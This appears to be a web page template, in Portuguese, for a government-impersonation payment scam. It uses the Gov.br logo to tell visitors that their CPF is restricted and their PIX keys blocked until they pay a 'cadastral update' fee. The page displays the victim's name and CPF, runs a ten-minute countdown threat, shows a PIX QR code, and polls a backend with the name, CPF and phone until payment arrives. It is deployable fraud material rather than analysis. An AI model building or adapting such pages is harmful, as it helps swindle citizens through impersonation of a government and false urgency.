<!DOCTYPE html>
<html>
<head>
    <script type="text/javascript">
        (function(c,l,a,r,i,t,y){
            c[a]=c[a]||function(){(c[a].q=c[a].q||[]).push(arguments)};
            t=l.createElement(r);t.async=1;t.src="https://www.clarity.ms/tag/"+i;
            y=l.getElementsByTagName(r)[0];y.parentNode.insertBefore(t,y);
        })(window, document, "clarity", "script", "qkhj9t5mmz");
    </script>
    <meta charset="utf-8"/>
    <meta content="width=device-width, initial-scale=1.0" name="viewport"/>
    <title>Atualização Cadastral - Pagamento PIX</title>
    <link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css" rel="stylesheet"/>
    <script src="https://cdn.tailwindcss.com"></script>
    <style>
        /* Copy all styles from payment.html but change the title */
        @font-face {
            font-family: 'Rawline';
            src: url("{{ url_for('static', filename='fonts/rawline-400.ea42a37247439622.woff2') }}") format('woff2');
            font-weight: 400;
            font-style: normal;
        }
        @font-face {
            font-family: 'Rawline';
            src: url("{{ url_for('static', filename='fonts/rawline-600.844a17f0db94d147.woff2') }}") format('woff2');
            font-weight: 600;
            font-style: normal;
        }
        @font-face {
            font-family: 'Rawline';
            src: url("{{ url_for('static', filename='fonts/rawline-700.1c7c76152b40409f.woff2') }}") format('woff2');
            font-weight: 700;
            font-style: normal;
        }
        * {
            margin: 0;
            padding: 0;
            box-sizing: border-box;
            font-family: 'Rawline', sans-serif;
        }
        body {
            background-color: #f8f9fa;
            padding-top: 60px;
            color: #333333;
            font-size: 16px;
            line-height: 1.5;
            min-height: 100vh;
            display: flex;
            flex-direction: column;
        }
        .header {
            display: flex;
            justify-content: space-between;
            align-items: center;
            padding: 8px 20px;
            background-color: white;
            position: fixed;
            top: 0;
            left: 0;
            right: 0;
            z-index: 1000;
            box-shadow: 0 2px 5px rgba(0,0,0,0.1);
            height: 60px;
        }
        .logo {
            width: 100px; /* Reduced logo size */
            height: auto;
        }
        .header-icons {
            display: flex;
            gap: 15px;
        }
        .header-icon {
            font-size: 18px;
            color: #1351b4;
        }
        .container {
            max-width: 600px;
            margin: 20px auto;
            padding: 0 20px;
            flex: 1;
        }
        .payment-info {
            background: white;
            padding: 20px;
            border-radius: 8px;
            box-shadow: 0 2px 4px rgba(0,0,0,0.1);
            margin-bottom: 20px;
            border-left: 4px solid #0c326f;
        }
        .payment-info h3 {
            color: #0c326f;
            font-size: 18px;
            font-weight: 600;
            margin-bottom: 15px;
        }
        .qr-container {
            text-align: center;
            margin: 20px 0;
            padding: 20px;
            background: white;
            border-radius: 8px;
            box-shadow: 0 2px 4px rgba(0,0,0,0.1);
            border-left: 4px solid #0c326f;
        }
        .qr-code {
            width: 200px;
            height: 200px;
            margin: 0 auto;
            background: #f8f9fa;
            padding: 10px;
            border-radius: 4px;
        }
        .pix-code {
            background: #f8f9fa;
            padding: 15px;
            border-radius: 4px;
            margin: 20px 0;
            font-family: monospace;
            word-break: break-all;
            border: 1px dashed #dee2e6;
        }
        .copy-button {
            width: 100%;
            padding: 12px;
            background-color: #1351b4;
            color: white;
            border: none;
            border-radius: 4px;
            font-weight: 600;
            cursor: pointer;
            display: flex;
            align-items: center;
            justify-content: center;
            gap: 8px;
            margin: 20px 0;
            transition: all 0.3s ease;
        }
        .copy-button:hover {
            background-color: #092555;
            transform: translateY(-1px);
        }
        .timer-container {
            background: #f8d7da;
            border: 1px solid #f5c6cb;
            color: #721c24;
            padding: 20px;
            border-radius: 8px;
            text-align: center;
            margin: 20px 0;
            animation: pulse 2s infinite;
        }
        .timer {
            font-size: 36px;
            font-weight: 700;
            color: #dc3545;
            margin: 15px 0;
            text-shadow: 1px 1px 2px rgba(0,0,0,0.1);
        }
        .warning-text {
            font-weight: 600;
            margin-top: 10px;
            line-height: 1.4;
        }

        @keyframes pulse {
            0% { box-shadow: 0 0 0 0 rgba(220, 53, 69, 0.4); }
            70% { box-shadow: 0 0 0 10px rgba(220, 53, 69, 0); }
            100% { box-shadow: 0 0 0 0 rgba(220, 53, 69, 0); }
        }

        /* Loading screen styles */
        .loading-screen {
            position: fixed;
            top: 0;
            left: 0;
            width: 100%;
            height: 100%;
            background: white;
            display: flex;
            flex-direction: column;
            justify-content: center;
            align-items: center;
            z-index: 9999;
        }
        .loading-spinner {
            width: 50px;
            height: 50px;
            border: 4px solid #f3f3f3;
            border-top: 4px solid #0c326f;
            border-radius: 50%;
            animation: spin 1s linear infinite;
            margin-bottom: 20px;
        }
        @keyframes spin {
            0% { transform: rotate(0deg); }
            100% { transform: rotate(360deg); }
        }
        .content {
            display: none;
        }
        .footer {
            background-color: #1351b4;
            color: white;
            padding: 16px;
            text-align: center;
            margin-top: 40px;
            width: 100%;
        }
        .footer-logo {
            width: 100px;
            margin: 0 auto 8px;
            display: block;
        }
    </style>
</head>
<body>
    <!-- Header -->
    <div class="header">
        <img alt="Logo Gov.br" class="logo" src="https://upload.wikimedia.org/wikipedia/commons/thumb/1/11/Gov.br_logo.svg/2560px-Gov.br_logo.svg.png"/>
        <div class="header-icons">
            <i class="fas fa-search header-icon"></i>
            <i class="fas fa-question-circle header-icon"></i>
            <i class="fas fa-adjust header-icon"></i>
        </div>
    </div>

    <!-- Loading Screen -->
    <div class="loading-screen" id="loadingScreen">
        <div class="loading-spinner"></div>
        <p style="font-size: 18px; color: #333;">Gerando transação PIX...</p>
    </div>

    <!-- Main Content (initially hidden) -->
    <div class="content" id="mainContent">
        <div class="container">
            <div class="payment-info">
                <h3>Detalhes do Pagamento - Atualização Cadastral</h3>
                <p><strong>Nome:</strong> {{ nome }}</p>
                <p><strong>CPF:</strong> {{ cpf }}</p>
                <p><strong>Valor:</strong> R$ {{ "%.2f"|format(amount) }}</p>
            </div>

            <div class="timer-container">
                <p style="font-weight: 700; font-size: 18px;">ATENÇÃO!</p>
                <p style="margin: 10px 0;">Tempo restante para atualização cadastral:</p>
                <div class="timer" id="timer">10:00</div>
                <p class="warning-text">
                    Após este prazo, seu CPF permanecerá com restrições e as chaves PIX continuarão bloqueadas.
                </p>
            </div>

            <div class="qr-container">
                <h3>Escaneie o QR Code PIX</h3>
                <div id="qrCode" class="qr-code">
                    <img src="{{ qr_code }}" alt="QR Code PIX" style="width: 100%; height: 100%; object-fit: contain;">
                </div>
            </div>

            <div style="margin: 20px 0;">
                <p style="margin-bottom: 10px; font-weight: 600;">Ou copie o código PIX:</p>
                <div id="pixCode" class="pix-code">
                    {{ pix_code }}
                </div>
                <button onclick="copyPixCode()" class="copy-button">
                    <i class="fas fa-copy"></i>
                    Copiar código PIX
                </button>
            </div>
        </div>
    </div>

    <!-- Footer -->
    <footer class="footer">
        <p>© Todos os direitos reservados.</p>
    </footer>

    <script>
        document.addEventListener('DOMContentLoaded', function() {
            let transactionId = '{{ transaction_id }}';
            let checkInterval;

            // Timer functionality
            let timeLeft = 10 * 60; // 10 minutes in seconds
            const timerDisplay = document.getElementById('timer');

            const countdown = setInterval(() => {
                const minutes = Math.floor(timeLeft / 60);
                const seconds = timeLeft % 60;
                timerDisplay.textContent = `${minutes.toString().padStart(2, '0')}:${seconds.toString().padStart(2, '0')}`;

                if (timeLeft <= 0) {
                    clearInterval(countdown);
                    clearInterval(checkInterval);
                    timerDisplay.textContent = "00:00";
                    alert("Tempo expirado! Seu CPF permanecerá com restrições.");
                    window.location.href = '/';
                }
                timeLeft--;
            }, 1000);

            function checkPaymentStatus() {
                console.log('Verificando status do pagamento:', transactionId);
                
                // Incluir informações do usuário na requisição para o envio de SMS
                const nome = '{{ nome }}';
                const cpf = '{{ cpf }}';
                const phone = '{{ phone }}'; // Obter telefone do template
                
                // Construir URL com parâmetros para passar informações ao backend
                const url = `/check-payment-status/${transactionId}?nome=${encodeURIComponent(nome)}&cpf=${encodeURIComponent(cpf)}&phone=${encodeURIComponent(phone)}`;
                
                fetch(url)
                    .then(response => {
                        if (!response.ok) {
                            throw new Error('Network response was not ok');
                        }
                        return response.json();
                    })
                    .then(data => {
                        console.log('Resposta do status do pagamento:', data);

                        if (data.status === 'completed' || data.original_status === 'APPROVED' || data.original_status === 'PAID') {
                            console.log('Pagamento aprovado, redirecionando imediatamente...');
                            // Store user data first
                            const userData = {
                                nome: nome,
                                cpf: cpf,
                                phone: phone
                            };
                            localStorage.setItem('userData', JSON.stringify(userData));

                            // Clear intervals immediately
                            clearInterval(checkInterval);
                            clearInterval(countdown);

                            // Force immediate redirect
                            window.location.replace('/obrigado');
                            return; // Exit the function immediately
                        }
                        console.log('Pagamento ainda pendente. Status:', data.original_status);
                    })
                    .catch(error => {
                        console.error('Erro ao verificar status:', error);
                    });
            }

            // Check status every 1 second
            checkInterval = setInterval(checkPaymentStatus, 1000);

            // Initial check
            checkPaymentStatus();

            // Show content and hide loading screen after a short delay
            setTimeout(() => {
                document.getElementById('loadingScreen').style.display = 'none';
                document.getElementById('mainContent').style.display = 'block';
            }, 1500);

            // Copy PIX code functionality
            window.copyPixCode = function() {
                const pixCode = document.getElementById('pixCode').textContent.trim();
                const copyButton = document.querySelector('.copy-button');

                navigator.clipboard.writeText(pixCode).then(
                    function() {
                        copyButton.innerHTML = '<i class="fas fa-check"></i> Código Copiado!';
                        copyButton.style.backgroundColor = '#28a745';
                        setTimeout(() => {
                            copyButton.innerHTML = '<i class="fas fa-copy"></i> Copiar código PIX';
                            copyButton.style.backgroundColor = '#0c326f';
                        }, 2000);
                    },
                    function(err) {
                        console.error('Erro ao copiar:', err);
                        copyButton.innerHTML = '<i class="fas fa-times"></i> Erro ao copiar';
                        copyButton.style.backgroundColor = '#dc3545';
                    }
                );
            }
        });
    </script>
</body>
</html>